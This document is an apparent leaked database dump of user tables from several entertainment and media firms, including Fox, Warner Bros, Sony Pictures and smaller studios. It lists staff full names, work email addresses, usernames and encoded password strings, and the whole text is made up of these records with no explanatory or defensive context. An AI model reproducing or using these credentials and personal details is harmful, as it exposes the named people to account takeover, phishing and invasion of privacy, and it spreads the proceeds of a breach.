<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY FOX &#8211; http://www.fox.com/ -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Fox Vendor &nbsp;&nbsp;&nbsp; &nbsp;jonathan.tavss@fox.com foxVendor oU2kk5Um7CU/eymCXJslsQ==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Fox Approvals jonathan.tavss@fox.com foxApprov V9dU4qOh+hf4ldQxpVSZEQ==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mark Levien &nbsp;&nbsp;&nbsp; &nbsp;mark.levien@fox.com mlevien f0AuD0EioeQZnO1pLqVjAw==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Peter Leeb &nbsp;&nbsp;&nbsp; &nbsp;peter.leeb@fox.com pleeb &nbsp;&nbsp;&nbsp; &nbsp;3pgiknsWP8tIMaH+AXNzcg==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">FHE &nbsp;&nbsp;&nbsp; &nbsp;Lucasfilm jenny.stiven@fox.com fhe &nbsp;&nbsp;&nbsp; &nbsp;baiHG2BJpKAChHs1X324+g==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jenny &nbsp;&nbsp;&nbsp; &nbsp;Stiven &nbsp;&nbsp;&nbsp; &nbsp;jenny.stiven@fox.com jenny &nbsp;&nbsp;&nbsp; &nbsp;FcfXB0SVesIMzilPxgL01w==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jonathan Tavss &nbsp;&nbsp;&nbsp; &nbsp;jonathan.tavss@fox.com jtavss &nbsp;&nbsp;&nbsp; &nbsp;zUVFCNHofqlIstU2dRErRw==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kelly &nbsp;&nbsp;&nbsp; &nbsp;Oram &nbsp;&nbsp;&nbsp; &nbsp;Kelly.Oram@fox.com kellyo &nbsp;&nbsp;&nbsp; &nbsp;1oyZT/FVRHzGx59FEfjs0B0dWezNltGqM</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Michelle Shnaider Michelle.Shnaider@fox.com michelle TmHec65cURES1pp1KtfsuA==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">******************************************************************************************************</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY WANERBROS &#8211; http://www.warnerbros.com/ -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ciara Castro &nbsp;&nbsp;&nbsp; &nbsp;Ciara.Castro@warnerbros.com ccastro VfZRZetokIN7Vs80q4NnqA==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">WHV Interactive elisa.chun@warnerbros.com whv Aa7hyimavvNrb/sMsCeg5d11lJphO83EM</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cathy &nbsp;&nbsp;&nbsp; &nbsp;Johnson &nbsp;&nbsp;&nbsp; &nbsp;Cathy.Johnson@warnerbros.com CJohnson EZk7+Uh/22bE0zLr9//taA==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Elisa &nbsp;&nbsp;&nbsp; &nbsp;Chun &nbsp;&nbsp;&nbsp; &nbsp;Elisa.Chun@warnerbros.com echun &nbsp;&nbsp;&nbsp; &nbsp;1Oz/w9zknZY4VTfmhZN5Cg==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lauren &nbsp;&nbsp;&nbsp; &nbsp;Vu &nbsp;&nbsp;&nbsp; &nbsp;Lauren.Vu@warnerbros.com lvu &nbsp;&nbsp;&nbsp; &nbsp;MbUSU3WDKYXOj5Pkf9sl+w==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mary &nbsp;&nbsp;&nbsp; &nbsp;Heimbold &nbsp;&nbsp;&nbsp; &nbsp;Mary.Heimbold@warnerbros.com Mheimbold hwBV+665zWSuqwuFrmLq7Q==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Traci &nbsp;&nbsp;&nbsp; &nbsp;Carroll &nbsp;&nbsp;&nbsp; &nbsp;Traci.Carroll@warnerbros.com Tcarroll kTEmCBpxCWE4J1THDMPHVw==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">WHV &nbsp;&nbsp;&nbsp; &nbsp;Interactive jouvan.laali@warnerbros.com whv &nbsp;&nbsp;&nbsp; &nbsp;H3Fr+H8MMcndZkosETfs65vkgIC7zOmwM</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">******************************************************************************************************</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY SONY &#8211; http://www.sony.com/ -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jake &nbsp;&nbsp;&nbsp; &nbsp;Zim &nbsp;&nbsp;&nbsp; &nbsp;Jake_Zim@sony.com jake &nbsp;&nbsp;&nbsp; &nbsp;InvEEW9YN4VRBUbEbkiCcArvx5VO+ODiM</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY SONY_PICTURES &#8211; http://www.sonypictures.com/ -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Sony &nbsp;&nbsp;&nbsp; &nbsp;Imageworks &nbsp;&nbsp;&nbsp; &nbsp;karendain@sonypictures.com imageworks gTtVsMGJAwu2oZkAIarBzg==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">**********************************************************************************************</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY RPM-Productions &#8211; http://rpm-productions.com/ -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dawn &nbsp;&nbsp;&nbsp; &nbsp;Olejar &nbsp;&nbsp;&nbsp; &nbsp;dolejar@RPM-productions.com dolejar &nbsp;&nbsp;&nbsp; &nbsp;mti33IJjmFEOardMlPJ0rQ==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Joe &nbsp;&nbsp;&nbsp; &nbsp;Rhoades jrhoades@rpm-productions.com jrhoades &nbsp;&nbsp;&nbsp; &nbsp;ydgCViIHEovYFZ3H4HhEWg==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Monroe &nbsp;&nbsp;&nbsp; &nbsp;Robertson &nbsp;&nbsp;&nbsp; &nbsp;mrobertson@rpm-productions.com mrobertson &nbsp;&nbsp;&nbsp; &nbsp;4f7p/0MKA/+b+0yR4bTEMg==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">***********************************************************************************************</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">6)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY ADDISONIN INTERACTIVE &#8211; http://addisoninteractive.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;-</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first name_last email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AI &nbsp;&nbsp;&nbsp; &nbsp;Guest &nbsp;&nbsp;&nbsp; &nbsp;scott@addisoninteractive.com aiguest t4ef2L1kRPkDbyyXGmrzog==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Billy &nbsp;&nbsp;&nbsp; &nbsp;Duke &nbsp;&nbsp;&nbsp; &nbsp;billy@addisoninteractive.com billy ulYD4jdP90kcx70nPzmBSA==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mark &nbsp;&nbsp;&nbsp; &nbsp;McBride &nbsp;&nbsp;&nbsp; &nbsp;mcbride@addisoninteractive.com mcbride R3pE+nogCesbC9xLCgbS/g==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Ron Pasillas &nbsp;&nbsp;&nbsp; &nbsp;ron@addisoninteractive.com &nbsp;&nbsp;&nbsp; &nbsp;rpasillas SEw2XmdiP1LZ6yTOz+89Sw==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Chrys &nbsp;&nbsp;&nbsp; &nbsp;Coulter &nbsp;&nbsp;&nbsp; &nbsp;chrys@addisoninteractive.com ccoulter M58zD0JGjefN7UuTc1Gmvw==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Scott Clay &nbsp;&nbsp;&nbsp; &nbsp;scott@addisoninteractive.com sclay l9Qp3X4AsBhC+i4MBVnp4A==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Aaron &nbsp;&nbsp;&nbsp; &nbsp;Vill &nbsp;&nbsp;&nbsp; &nbsp;aaron@addisoninteractive.com aaron 8CmHLWsOSCAo4sdS1TCzoQ==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Michael LeMay &nbsp;&nbsp;&nbsp; &nbsp;michael@addisoninteractive.com mlemay 0RcAbILuiQB13VWtUe3Dag==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dez &nbsp;&nbsp;&nbsp; &nbsp;Einswell &nbsp;&nbsp;&nbsp; &nbsp;dez@addisoninteractive.com &nbsp;&nbsp;&nbsp; &nbsp;aidez CYwFisTLweRlfVEB4n5D/Q==M</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anthony Malzone &nbsp;&nbsp;&nbsp; &nbsp;anthony@addisoninteractive.com anthony Oz6Aqz1jNYTZT861ZiuqGOhVSa4oIzcjM</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">***********************************************************************************************</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">7)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY VIBE_CREATIVE &#8211; http://vibecreativela.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last &nbsp;&nbsp;&nbsp; &nbsp;email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Paul Holtzhausen aul@vibecreativela.com paul &nbsp;&nbsp;&nbsp; &nbsp;Yx5mbDITTmv/GhbTIlVzvRJNhFL04UKzM</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">8)&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">[#] Table User [#] &#8211; COMPANY NOODLE_HAUS &#8211; http://noodle-haus.com -</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&mdash;&ndash;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">name_first &nbsp;&nbsp;&nbsp; name_last email &nbsp;&nbsp;&nbsp; &nbsp;username password</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Daniel &nbsp;&nbsp;&nbsp; Krechmer daniel@noodle-haus.com dkrechmer G3gpTLbYuQWqASWwwwRDnQ==M</span></p>
